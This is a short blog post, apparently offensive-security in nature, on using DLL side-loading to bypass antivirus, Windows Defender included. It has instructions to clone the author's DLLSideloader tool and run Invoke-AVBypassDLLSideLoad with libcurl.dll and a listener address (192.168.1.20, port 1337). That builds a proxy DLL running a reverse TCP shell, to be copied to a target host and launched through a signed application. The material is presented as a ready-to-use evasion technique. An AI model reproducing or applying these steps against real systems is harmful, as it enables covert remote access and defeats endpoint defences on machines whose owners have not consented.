Bypassing AV's using DLL Side-Loading
- reading time
- 2 minutes
In one of my earlier blog posts, I talked about and released a working PowerShell script to dump DLL Function calls from a signed executable, compile a “proxy” DLL and successfully run a DLL Sideloading attack.DLL Side-Loading allows you to make “safe” and singed applications run whatever code you want ( Application that load DLL’s in an unsafe way that is ) This time we will look into using this to bypass AV’s, including the latest version of Windows Defender. We are working out of the same context from the earlier blog post, so go read that first! To make this as easy as possible we are going to implement a simple reverse TCP connection in C++ inside the “proxy” DLL (B), instead of using an extra 3 DLL. (C)
C++ source for a simple reverse shell to run at entry point, slightly modified source from sh3llc0d3r1337 GitHub Let’s get started
Generate “proxy” DLL
OPS! Make sure you have THE 2019 version of “Build Tools for Visual Studio” installed
Clone my DLL-Sideloading project from Github, load the powershell script into the session and execute the following function. The repository contains a binary copy of “DLL Export VIewer”, a great freeware and tool published by Nir Sofer Our PowerShell script uses this application to dump the function call names from the DLL, feel free to download and place the binary from nirsoft directly if you don’t feel comfortable with using the one provided by me.
git clone https://github.com/SkiddieTech/DLLSideloader
Invoke-AVBypassDLLSideLoad libcurl.dll 192.168.1.20 1337
The powershell script will (hopefully) run like below
The following files are generated.
After moving the files over to the target host, make sure they are all inn the same directory and execute application!